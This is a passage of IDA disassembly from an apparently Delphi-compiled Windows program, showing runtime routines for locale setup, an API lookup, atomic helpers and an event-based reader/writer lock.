; sub_4000BD04+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4000BD04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000BD44 proc near ; CODE XREF: sub_4000BDA0+96�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
add edi, 0FFFFFFECh
push edi
push 0
call sub_40006558 ; GetCPInfo
xor esi, esi
jmp short loc_4000BD87
; ---------------------------------------------------------------------------
loc_4000BD5D: ; CODE XREF: sub_4000BD44+51�j
movzx eax, byte ptr [edi+esi+6]
movzx ebx, byte ptr [edi+esi+7]
sub bl, al
jb short loc_4000BD84
inc ebx
mov [ebp+var_1], al
loc_4000BD6F: ; CODE XREF: sub_4000BD44+3E�j
movzx eax, [ebp+var_1]
movzx eax, al
bts dword_4001A82C, eax
inc [ebp+var_1]
dec bl
jnz short loc_4000BD6F
loc_4000BD84: ; CODE XREF: sub_4000BD44+25�j
add esi, 2
loc_4000BD87: ; CODE XREF: sub_4000BD44+17�j
cmp esi, 0Ch
jge short loc_4000BD97
movzx eax, byte ptr [edi+esi+6]
or al, [edi+esi+7]
jnz short loc_4000BD5D
loc_4000BD97: ; CODE XREF: sub_4000BD44+46�j
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn
sub_4000BD44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000BDA0 proc near ; CODE XREF: sub_4000BE64+1E�p
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
mov esi, offset dword_4001E8C8
mov dword ptr [esi], 409h
mov dword ptr [esi+4], 9
mov dword ptr [esi+8], 1
call sub_400065C8 ; GetThreadLocale
test eax, eax
jz short loc_4000BDCD
mov [esi], eax
loc_4000BDCD: ; CODE XREF: sub_4000BDA0+29�j
test ax, ax
jz short loc_4000BDE8
mov edx, eax
and dx, 3FFh
movzx edx, dx
mov [esi+4], edx
movzx eax, ax
shr eax, 0Ah
mov [esi+8], eax
loc_4000BDE8: ; CODE XREF: sub_4000BDA0+30�j
push esi
mov esi, offset dword_4000BE44
mov edi, offset dword_4001A82C
mov ecx, 8
rep movsd
pop esi
cmp dword_4001A7E8, 4
jle short loc_4000BE13
cmp dword_4001A7E4, 2
jnz short loc_4000BE13
mov byte ptr [esi+0Dh], 1
jmp short loc_4000BE22
; ---------------------------------------------------------------------------
loc_4000BE13: ; CODE XREF: sub_4000BDA0+62�j
; sub_4000BDA0+6B�j
push 4Ah
call sub_40006728 ; GetSystemMetrics
test eax, eax
setnz al
mov [esi+0Dh], al
loc_4000BE22: ; CODE XREF: sub_4000BDA0+71�j
push 2Ah
call sub_40006728 ; GetSystemMetrics
test eax, eax
setnz bl
mov [esi+0Ch], bl
test bl, bl
jz short loc_4000BE3C
push ebp
call sub_4000BD44
pop ecx
loc_4000BE3C: ; CODE XREF: sub_4000BDA0+93�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000BDA0 endp
; ---------------------------------------------------------------------------
align 4
dword_4000BE44 dd 8 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000BE64 proc near ; CODE XREF: sub_400190AC+5F�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 8
loc_4000BE6C: ; CODE XREF: sub_4000BE64+D�j
push 0
push 0
dec ecx
jnz short loc_4000BE6C
push ebx
xor eax, eax
push ebp
push offset loc_4000C12F
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_4000BDA0
call sub_4000A91C
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BE9A
call sub_4000AAF4
loc_4000BE9A: ; CODE XREF: sub_4000BE64+2F�j
call sub_400065C8 ; GetThreadLocale
mov ebx, eax
lea eax, [ebp+var_10]
push eax
xor ecx, ecx
mov edx, 14h
mov eax, ebx
call sub_4000A868
mov edx, [ebp+var_10]
mov eax, offset dword_4001E808
call sub_400048D8
lea eax, [ebp+var_14]
push eax
mov ecx, offset dword_4000C144
mov edx, 1Bh
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_14]
xor edx, edx
call sub_40007DD4
mov ds:byte_4001E80C, al
lea eax, [ebp+var_18]
push eax
mov ecx, offset dword_4000C144
mov edx, 1Ch
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_18]
xor edx, edx
call sub_40007DD4
mov ds:byte_4001E80D, al
mov cl, 2Ch
mov edx, 0Fh
mov eax, ebx
call sub_4000A8B4
mov ds:byte_4001E80E, al
mov cl, 2Eh
mov edx, 0Eh
mov eax, ebx
call sub_4000A8B4
mov ds:byte_4001E80F, al
lea eax, [ebp+var_1C]
push eax
mov ecx, offset dword_4000C144
mov edx, 19h
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_1C]
xor edx, edx
call sub_40007DD4
mov ds:byte_4001E810, al
mov cl, 2Fh
mov edx, 1Dh
mov eax, ebx
call sub_4000A8B4
mov ds:byte_4001E811, al
lea eax, [ebp+var_24]
push eax
mov ecx, offset dword_4000C150
mov edx, 1Fh
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_24]
lea edx, [ebp+var_20]
call sub_4000ABA4
mov edx, [ebp+var_20]
mov eax, offset dword_4001E814
call sub_400048D8
lea eax, [ebp+var_2C]
push eax
mov ecx, offset dword_4000C160
mov edx, 20h
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_2C]
lea edx, [ebp+var_28]
call sub_4000ABA4
mov edx, [ebp+var_28]
mov eax, offset dword_4001E818
call sub_400048D8
mov cl, 3Ah
mov edx, 1Eh
mov eax, ebx
call sub_4000A8B4
mov ds:byte_4001E81C, al
lea eax, [ebp+var_30]
push eax
mov ecx, offset dword_4000C178
mov edx, 28h
mov eax, ebx
call sub_4000A868
mov edx, [ebp+var_30]
mov eax, offset dword_4001E820
call sub_400048D8
lea eax, [ebp+var_34]
push eax
mov ecx, offset dword_4000C184
mov edx, 29h
mov eax, ebx
call sub_4000A868
mov edx, [ebp+var_34]
mov eax, offset dword_4001E824
call sub_400048D8
lea eax, [ebp+var_8]
call sub_40004884
lea eax, [ebp+var_C]
call sub_40004884
lea eax, [ebp+var_38]
push eax
mov ecx, offset dword_4000C144
mov edx, 25h
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_38]
xor edx, edx
call sub_40007DD4
test eax, eax
jnz short loc_4000C058
lea eax, [ebp+var_4]
mov edx, offset dword_4000C190
call sub_4000491C
jmp short loc_4000C065
; ---------------------------------------------------------------------------
loc_4000C058: ; CODE XREF: sub_4000BE64+1E3�j
lea eax, [ebp+var_4]
mov edx, offset dword_4000C19C
call sub_4000491C
loc_4000C065: ; CODE XREF: sub_4000BE64+1F2�j
lea eax, [ebp+var_3C]
push eax
mov ecx, offset dword_4000C144
mov edx, 23h
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_3C]
xor edx, edx
call sub_40007DD4
test eax, eax
jnz short loc_4000C0C7
lea eax, [ebp+var_40]
push eax
mov ecx, offset dword_4000C144
mov edx, 1005h
mov eax, ebx
call sub_4000A868
mov eax, [ebp+var_40]
xor edx, edx
call sub_40007DD4
test eax, eax
jnz short loc_4000C0BA
lea eax, [ebp+var_C]
mov edx, offset dword_4000C1A8
call sub_4000491C
jmp short loc_4000C0C7
; ---------------------------------------------------------------------------
loc_4000C0BA: ; CODE XREF: sub_4000BE64+245�j
lea eax, [ebp+var_8]
mov edx, offset dword_4000C1B8
call sub_4000491C
loc_4000C0C7: ; CODE XREF: sub_4000BE64+222�j
; sub_4000BE64+254�j
push [ebp+var_8]
push [ebp+var_4]
push offset dword_4000C1C8
push [ebp+var_C]
mov eax, offset dword_4001E828
mov edx, 4
call sub_40004C08
push [ebp+var_8]
push [ebp+var_4]
push offset dword_4000C1D4
push [ebp+var_C]
mov eax, offset dword_4001E82C
mov edx, 4
call sub_40004C08
mov cl, 2Ch
mov edx, 0Ch
mov eax, ebx
call sub_4000A8B4
mov byte ptr ds:dword_4001E8D4+2, al
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000C136
loc_4000C121: ; CODE XREF: sub_4000BE64+2D0�j
lea eax, [ebp+var_40]
mov edx, 10h
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_4000C12F: ; DATA XREF: sub_4000BE64+13�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000C121
; ---------------------------------------------------------------------------
loc_4000C136: ; CODE XREF: sub_4000BE64+2CA�j
; DATA XREF: sub_4000BE64+2B8�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000BE64 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_4000C144 dd 30h, 0FFFFFFFFh, 6 ; sub_4000BE64+84�o ...
dword_4000C150 dd 2F642F6Dh, 7979h, 0FFFFFFFFh, 0Chdword_4000C160 dd 6D6D6D6Dh, 202C6420h, 79797979h, 0 dd 0FFFFFFFFh, 2
dword_4000C178 dd 6D61h, 0FFFFFFFFh, 2dword_4000C184 dd 6D70h, 0FFFFFFFFh, 1dword_4000C190 dd 68h, 0FFFFFFFFh, 2dword_4000C19C dd 6868h, 0FFFFFFFFh, 5dword_4000C1A8 dd 504D4120h, 4Dh, 0FFFFFFFFh, 5dword_4000C1B8 dd 4D504D41h, 20h, 0FFFFFFFFh, 3dword_4000C1C8 dd 6D6D3Ah, 0FFFFFFFFh, 6dword_4000C1D4 dd 3A6D6D3Ah, 7373hoff_4000C1DC dd offset dword_4000C1E0 ; DATA XREF: .text:4000C225�o
dword_4000C1E0 dd 55540E11h, 4874696Eh, 41687361h, 79617272h, 14h, 0
; DATA XREF: .text:off_4000C1DC�o
dd 0FFFFFFFFh, 0
dd 73795308h, 6C697455h, 408D73h
off_4000C20C dd offset dword_4000C210 ; DATA XREF: sub_4000C230:loc_4000C3EB�r
dword_4000C210 dd 4D540B0Eh, 6C75646Fh, 666E4965h, 86Fh, 100h
; DATA XREF: .text:off_4000C20C�o
db 0
dd offset off_4000C1DC
db 4, 2 dup(0)
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000C230 proc near ; DATA XREF: sub_4000CC50+27�o
; sub_400190AC+4B�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov edx, off_4001B074
mov edx, [edx]
test edx, edx
jz short loc_4000C24E
loc_4000C243: ; CODE XREF: sub_4000C230+1C�j
cmp eax, [edx+4]
jz short loc_4000C24E
mov edx, [edx]
test edx, edx
jnz short loc_4000C243
loc_4000C24E: ; CODE XREF: sub_4000C230+11�j
; sub_4000C230+16�j
mov [esp+1Ch+var_1C], edx
cmp [esp+1Ch+var_1C], 0
jz loc_4000C400
mov eax, [esp+1Ch+var_1C]
cmp dword ptr [eax+14h], 0
jz loc_4000C400
mov eax, [esp+1Ch+var_1C]
mov ebx, [eax+14h]
cmp byte ptr [ebx], 0
jz short loc_4000C27D
mov [esp+1Ch+var_18], offset dword_4001EA24
jmp short loc_4000C285
; ---------------------------------------------------------------------------
loc_4000C27D: ; CODE XREF: sub_4000C230+41�j
mov [esp+1Ch+var_18], offset dword_4001EE24
loc_4000C285: ; CODE XREF: sub_4000C230+4B�j
mov eax, [ebx+4]
call sub_40005974
mov edi, eax
test edi, edi
jl loc_4000C3EB
inc edi
xor esi, esi
loc_4000C29A: ; CODE XREF: sub_4000C230+1B5�j
lea eax, [esi+esi*4]
mov edx, [ebx+4]
cmp dword ptr [edx+eax*4+4], 0
jz short loc_4000C2BE
mov edx, [ebx+4]
mov eax, [edx+eax*4]
lea edx, [esi+esi*4]
mov ecx, [ebx+4]
mov edx, [ecx+edx*4+4]
mov [edx], eax
jmp loc_4000C3C4
; ---------------------------------------------------------------------------
loc_4000C2BE: ; CODE XREF: sub_4000C230+75�j
mov edx, [ebx+4]
cmp dword ptr [edx+eax*4+0Ch], 0
jz loc_4000C3C4
lea eax, [esi+esi*4]
mov edx, [ebx+4]
mov eax, [edx+eax*4+0Ch]
xor edx, edx
mov [esp+1Ch+var_14], edx
loc_4000C2DC: ; CODE XREF: sub_4000C230+153�j
movzx edx, byte ptr [eax]
test dl, dl
jz loc_4000C388
mov ecx, [esp+1Ch+var_14]
add ecx, ecx
add ecx, ecx
mov ebp, [esp+1Ch+var_14]
shr ebp, 1Eh
or ecx, ebp
movzx edx, dl
movzx edx, ds:byte_4001E924[edx]
xor ecx, edx
mov [esp+1Ch+var_14], ecx
cmp byte ptr [eax+1], 0
jz short loc_4000C388
mov edx, [esp+1Ch+var_14]
add edx, edx
add edx, edx
mov ecx, [esp+1Ch+var_14]
shr ecx, 1Eh
or edx, ecx
movzx ecx, byte ptr [eax+1]
movzx ecx, ds:byte_4001E924[ecx]
xor edx, ecx
mov [esp+1Ch+var_14], edx
cmp byte ptr [eax+2], 0
jz short loc_4000C388
mov edx, [esp+1Ch+var_14]
add edx, edx
add edx, edx
mov ecx, [esp+1Ch+var_14]
shr ecx, 1Eh
or edx, ecx
movzx ecx, byte ptr [eax+2]
movzx ecx, ds:byte_4001E924[ecx]
xor edx, ecx
mov [esp+1Ch+var_14], edx
cmp byte ptr [eax+3], 0
jz short loc_4000C388
mov edx, [esp+1Ch+var_14]
add edx, edx
add edx, edx
mov ecx, [esp+1Ch+var_14]
shr ecx, 1Eh
or edx, ecx
movzx ecx, byte ptr [eax+3]
movzx ecx, ds:byte_4001E924[ecx]
xor edx, ecx
mov [esp+1Ch+var_14], edx
add eax, 4
jmp loc_4000C2DC
; ---------------------------------------------------------------------------
loc_4000C388: ; CODE XREF: sub_4000C230+B1�j
; sub_4000C230+DC�j ...
movzx eax, byte ptr [esp+1Ch+var_14]
xor al, byte ptr [esp+1Ch+var_14+1]
xor al, byte ptr [esp+1Ch+var_14+2]
xor al, byte ptr [esp+1Ch+var_14+3]
movzx edx, al
mov ecx, [esp+1Ch+var_18]
mov edx, [ecx+edx*4]
lea ecx, [esi+esi*4]
mov ebp, [ebx+4]
lea ecx, [ebp+ecx*4+0]
cmp edx, ecx
jnz short loc_4000C3C4
lea edx, [esi+esi*4]
mov ecx, [ebx+4]
mov edx, [ecx+edx*4]
movzx eax, al
mov ecx, [esp+1Ch+var_18]
mov [ecx+eax*4], edx
loc_4000C3C4: ; CODE XREF: sub_4000C230+89�j
; sub_4000C230+96�j ...
lea eax, [esi+esi*4]
mov edx, [ebx+4]
cmp dword ptr [edx+eax*4], 0
jz short loc_4000C3E3
mov edx, [ebx+4]
mov eax, [edx+eax*4+4]
lea edx, [esi+esi*4]
mov ecx, [ebx+4]
mov edx, [ecx+edx*4]
mov [edx+4], eax
loc_4000C3E3: ; CODE XREF: sub_4000C230+19E�j
inc esi
dec edi
jnz loc_4000C29A
loc_4000C3EB: ; CODE XREF: sub_4000C230+61�j
mov edx, ds:off_4000C20C
mov eax, ebx
call sub_40005634
mov eax, [esp+1Ch+var_1C]
xor edx, edx
mov [eax+14h], edx
loc_4000C400: ; CODE XREF: sub_4000C230+25�j
; sub_4000C230+32�j
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000C230 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4000C408 proc near ; CODE XREF: .text:4000C8EA�p
jmp ds:dword_4002463C
sub_4000C408 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000C410 proc near ; CODE XREF: sub_40013E14+28�p
call sub_40006580 ; RtlGetLastWin32Error
call sub_4000C41C
retn
sub_4000C410 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000C41C proc near ; CODE XREF: sub_4000C410+5�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
xor edx, edx
mov [ebp+var_14], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_4000C4A7
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jz short loc_4000C473
mov [ebp+var_10], ebx
mov [ebp+var_C], 0
lea edx, [ebp+var_14]
mov eax, ebx
call sub_4000A81C
mov eax, [ebp+var_14]
mov [ebp+var_8], eax
mov [ebp+var_4], 0Bh
lea eax, [ebp+var_10]
push eax
push 1
mov ecx, off_4001B030
mov dl, 1
mov eax, ds:off_40007720
call sub_4000B128
mov edx, eax
jmp short loc_4000C487
; ---------------------------------------------------------------------------
loc_4000C473: ; CODE XREF: sub_4000C41C+1E�j
mov ecx, off_4001B0A4
mov dl, 1
mov eax, ds:off_40007720
call sub_4000B0EC
mov edx, eax
loc_4000C487: ; CODE XREF: sub_4000C41C+55�j
mov [edx+0Ch], ebx
mov eax, edx
call sub_400042E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000C4AE
loc_4000C49E: ; CODE XREF: sub_4000C41C+90�j
lea eax, [ebp+var_14]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000C4A7: ; DATA XREF: sub_4000C41C+11�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000C49E
; ---------------------------------------------------------------------------
loc_4000C4AE: ; CODE XREF: sub_4000C41C+8A�j
; DATA XREF: sub_4000C41C+7D�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000C41C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C4B4 proc near ; CODE XREF: sub_4000CC50+31�p
push ebx
push esi
mov esi, offset dword_4001AA04
jmp short loc_4000C4CF
; ---------------------------------------------------------------------------
loc_4000C4BD: ; CODE XREF: sub_4000C4B4+1E�j
mov ebx, [esi]
mov eax, [ebx]
mov [esi], eax
mov edx, 8
mov eax, ebx
call sub_40002C3C
loc_4000C4CF: ; CODE XREF: sub_4000C4B4+7�j
cmp dword ptr [esi], 0
jnz short loc_4000C4BD
pop esi
pop ebx
retn
sub_4000C4B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C4D8 proc near ; CODE XREF: sub_400190AC+5A�p
push ebx
push offset dword_4000C510
call sub_400065A0 ; GetModuleHandleA
mov ebx, eax
test ebx, ebx
jz short loc_4000C4F9
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001A850, eax
loc_4000C4F9: ; CODE XREF: sub_4000C4D8+F�j
cmp dword_4001A850, 0
jnz short loc_4000C50C
mov eax, offset sub_400080E8
mov dword_4001A850, eax
loc_4000C50C: ; CODE XREF: sub_4000C4D8+28�j
pop ebx
retn
sub_4000C4D8 endp
; ---------------------------------------------------------------------------
align 10h
dword_4000C510 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_4000C4D8+11�o
; =============== S U B R O U T I N E =======================================
sub_4000C534 proc near ; CODE XREF: sub_4000C79C+44�p
; sub_4000C79C+92�p ...
mov edx, 1
xchg eax, edx
lock xadd [edx], eax
inc eax
retn
sub_4000C534 endp
; =============== S U B R O U T I N E =======================================
sub_4000C540 proc near ; CODE XREF: sub_4000C79C+87�p
; .text:4000C8F9�p
mov edx, 0FFFFFFFFh
xchg eax, edx
lock xadd [edx], eax
dec eax
retn
sub_4000C540 endp
; =============== S U B R O U T I N E =======================================
sub_4000C54C proc near ; CODE XREF: sub_4000C5D0+62�p
; sub_4000C658+1E�p
xchg edx, [eax]
mov eax, edx
retn
sub_4000C54C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C554 proc near ; CODE XREF: sub_4000C79C+53�p
; sub_4000C79C+6D�p ...
xchg eax, edx
lock xadd [edx], eax
retn
sub_4000C554 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C55C proc near ; DATA XREF: .text:40007874�o
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
call sub_40003FD8
mov [esp+14h+var_14], dl
mov ebp, eax
xor edi, edi
loc_4000C56D: ; CODE XREF: sub_4000C55C+32�j
mov ebx, [ebp+edi*4+4]
xor eax, eax
mov [ebp+edi*4+4], eax
test ebx, ebx
jz short loc_4000C58A
loc_4000C57B: ; CODE XREF: sub_4000C55C+2C�j
mov esi, ebx
mov ebx, [ebx]
mov eax, esi
call sub_40002C3C
test ebx, ebx
jnz short loc_4000C57B
loc_4000C58A: ; CODE XREF: sub_4000C55C+1D�j
inc edi
cmp edi, 10h
jnz short loc_4000C56D
movzx edx, [esp+14h+var_14]
and dl, 0FCh
mov eax, ebp
call sub_40003CD8
cmp [esp+14h+var_14], 0
jle short loc_4000C5AB
mov eax, ebp
call sub_40003F80
loc_4000C5AB: ; CODE XREF: sub_4000C55C+46�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000C55C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000C5B4 proc near ; CODE XREF: sub_4000C5D0+C�p
; sub_4000C658+6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
call sub_40006560 ; GetCurrentThreadId
mov [ebp+var_2], ax
movzx eax, byte ptr [ebp+var_2]
xor al, byte ptr [ebp+var_2+1]
and al, 0Fh
pop ecx
pop ebp
retn
sub_4000C5B4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000C5D0 proc near ; CODE XREF: sub_4000C79C+2E�p
; .text:4000C851�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov [esp+14h+var_14], edx
mov edi, eax
mov eax, edi
call sub_4000C5B4
mov ebx, eax
call sub_40006560 ; GetCurrentThreadId
mov esi, eax
movzx eax, bl
mov ebp, [edi+eax*4+4]
jmp short loc_4000C5F6
; ---------------------------------------------------------------------------
loc_4000C5F3: ; CODE XREF: sub_4000C5D0+2D�j
mov ebp, [ebp+0]
loc_4000C5F6: ; CODE XREF: sub_4000C5D0+21�j
test ebp, ebp
jz short loc_4000C5FF
cmp esi, [ebp+4]
jnz short loc_4000C5F3
loc_4000C5FF: ; CODE XREF: sub_4000C5D0+28�j
test ebp, ebp
jnz short loc_4000C63A
mov eax, edi
call sub_4000C658
mov ebp, eax
test ebp, ebp
jnz short loc_4000C63A
mov eax, 10h
call sub_40002C08
mov ebp, eax
mov [ebp+4], esi
mov dword ptr [ebp+8], 7FFFFFFFh
mov [ebp+0], ebp
movzx eax, bl
lea eax, [edi+eax*4+4]
mov edx, ebp
call sub_4000C54C
mov [ebp+0], eax
loc_4000C63A: ; CODE XREF: sub_4000C5D0+31�j
; sub_4000C5D0+3E�j
mov eax, [esp+14h+var_14]
mov [eax], ebp
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000C5D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C648 proc near ; CODE XREF: .text:4000C88D�p
; .text:4000C92A�p
mov eax, [edx]
xor ecx, ecx
mov [eax+4], ecx
mov eax, [edx]
xor edx, edx
mov [eax+8], edx
retn
sub_4000C648 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C658 proc near ; CODE XREF: sub_4000C5D0+35�p
push ebx
push esi
mov ebx, eax
mov eax, ebx
call sub_4000C5B4
movzx eax, al
mov ebx, [ebx+eax*4+4]
test ebx, ebx
jz short loc_4000C695
loc_4000C66E: ; CODE XREF: sub_4000C658+3B�j
lea eax, [ebx+8]
mov edx, 7FFFFFFFh
call sub_4000C54C
mov esi, eax
cmp esi, 7FFFFFFFh
jz short loc_4000C68F
call sub_40006560 ; GetCurrentThreadId
mov [ebx+4], eax
jmp short loc_4000C695
; ---------------------------------------------------------------------------
loc_4000C68F: ; CODE XREF: sub_4000C658+2B�j
mov ebx, [ebx]
test ebx, ebx
jnz short loc_4000C66E
loc_4000C695: ; CODE XREF: sub_4000C658+14�j
; sub_4000C658+35�j
mov eax, ebx
pop esi
pop ebx
retn
sub_4000C658 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C69C proc near ; CODE XREF: sub_400191F8+30�p
push ebx
push esi
test dl, dl
jz short loc_4000C6AA
add esp, 0FFFFFFF0h
call sub_40003F30
loc_4000C6AA: ; CODE XREF: sub_4000C69C+4�j
mov ebx, edx
mov esi, eax
xor edx, edx
mov eax, esi
call sub_40003CB8
mov dword ptr [esi+0Ch], 0FFFFh
push 0
push 0FFFFFFFFh
push 0FFFFFFFFh
push 0
call sub_40006508 ; CreateEventA
mov [esi+10h], eax
push 0
push 0
push 0
push 0
call sub_40006508 ; CreateEventA
mov [esi+14h], eax
mov dword ptr [esi+18h], 0FFFFFFFFh
mov dl, 1
mov eax, ds:off_4000782C
call sub_40003CB8
mov [esi+20h], eax
mov eax, esi
test bl, bl
jz short loc_4000C709
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_4000C709: ; CODE XREF: sub_4000C69C+5C�j
mov eax, esi
pop esi
pop ebx
retn
sub_4000C69C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000C710 proc near ; DATA XREF: .text:40007950�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov eax, esi
call sub_4000C79C
mov edx, ebx
and dl, 0FCh
mov eax, esi
call sub_40003CD8
mov eax, [esi+10h]
push eax
call sub_400064F0 ; CloseHandle
mov eax, [esi+14h]
push eax
call sub_400064F0 ; CloseHandle
mov eax, [esi+20h]
call sub_40003CE8
test bl, bl
jle short loc_4000C753
mov eax, esi
call sub_40003F80
loc_4000C753: ; CODE XREF: sub_4000C710+3A�j
pop esi
pop ebx
retn
sub_4000C710 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C758 proc near ; CODE XREF: sub_4000C79C+1D�p
; sub_4000C79C+7B�p
mov eax, [eax+10h]
push eax
call sub_40006620 ; ResetEvent
retn
sub_4000C758 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C764 proc near ; CODE XREF: .text:4000C87A�p
mov eax, [eax+10h]
push eax
call sub_40006628 ; SetEvent
retn
sub_4000C764 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000C770 proc near ; CODE XREF: .text:4000C873�p
; .text:4000C8E3�p ...
mov eax, [eax+14h]
push eax
call sub_40006628 ; SetEvent
retn
sub_4000C770 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C77C proc near ; CODE XREF: .text:4000C8C8�p
; .text:4000C8F1�p
mov edx, [eax+18h]
push edx
mov eax, [eax+10h]
push eax
call sub_40006650 ; WaitForSingleObject
retn
sub_4000C77C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C78C proc near ; CODE XREF: sub_4000C79C+60�p
mov edx, [eax+18h]
push edx
mov eax, [eax+14h]
push eax
call sub_40006650 ; WaitForSingleObject
retn
sub_4000C78C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000C79C proc near ; CODE XREF: sub_4000C710+D�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebp, eax
mov bl, 1
call sub_40006560 ; GetCurrentThreadId
mov edi, eax
cmp edi, [ebp+24h]
jz loc_4000C83B
mov eax, ebp
call sub_4000C758
mov eax, [ebp+28h]
mov [esp+18h+var_14], eax
mov edx, esp
mov eax, [ebp+20h]
call sub_4000C5D0
mov eax, [esp+18h+var_18]
cmp dword ptr [eax+0Ch], 0
setnbe bl
test bl, bl
jz short loc_4000C801
lea eax, [ebp+0Ch]
call sub_4000C534
jmp short loc_4000C801
; ---------------------------------------------------------------------------
loc_4000C7E7: ; CODE XREF: sub_4000C79C+77�j
lea eax, [ebp+0Ch]
mov edx, 0FFFFh
call sub_4000C554
mov esi, eax
test esi, esi
jz short loc_4000C801
mov eax, ebp
call sub_4000C78C
loc_4000C801: ; CODE XREF: sub_4000C79C+3F�j
; sub_4000C79C+49�j ...
lea eax, [ebp+0Ch]
mov edx, 0FFFF0001h
call sub_4000C554
cmp eax, 0FFFFh
jnz short loc_4000C7E7
mov eax, ebp
call sub_4000C758
test bl, bl
jz short loc_4000C828
lea eax, [ebp+0Ch]
call sub_4000C540
loc_4000C828: ; CODE XREF: sub_4000C79C+82�j
mov [ebp+24h], edi
lea eax, [ebp+28h]
call sub_4000C534
dec eax
cmp eax, [esp+18h+var_14]
setz bl
loc_4000C83B: ; CODE XREF: sub_4000C79C+15�j
inc dword ptr [ebp+1Ch]
mov eax, ebx
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000C79C endp
; ---------------------------------------------------------------------------
align 4
push ebx
push ecx
mov ebx, eax
mov edx, esp
mov eax, [ebx+20h]
